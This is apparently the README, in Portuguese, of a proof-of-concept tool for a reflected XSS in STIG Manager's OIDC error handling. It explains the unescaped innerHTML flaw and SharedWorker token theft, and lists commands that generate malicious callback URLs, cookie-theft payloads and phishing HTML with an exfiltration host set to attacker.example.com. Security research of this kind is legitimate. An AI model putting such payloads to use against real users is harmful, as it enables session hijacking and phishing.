
Gerador de exploit de prova de conceito para XSS refletido na autenticação OIDC do STIG Manager, permitindo roubo de tokens de sessão através de URLs de callback manipuladas e saída HTML de phishing.
Prova de Conceito conceitual para a vulnerabilidade de Cross-Site Scripting (XSS) refletido no STIG Manager versões 1.5.10 até 1.6.7.
Existe uma vulnerabilidade de XSS refletido no código de tratamento de erros de autenticação OIDC do aplicativo web STIG Manager. Os parâmetros de consulta error e error_description retornados pelo provedor OIDC são escritos diretamente no DOM via innerHTML sem escape HTML. Um atacante que consiga criar uma URL maliciosa e convencer um usuário a segui-la pode executar JavaScript arbitrário no contexto da aplicação.
A vulnerabilidade é mais grave quando o usuário alvo possui uma sessão ativa do STIG Manager em outra aba do navegador — o código injetado pode se comunicar com o SharedWorker que gerencia o token de acesso, permitindo requisições autenticadas à API em nome da vítima.
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html
# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
Esta ferramenta é fornecida apenas para fins educacionais e pesquisa de segurança autorizada.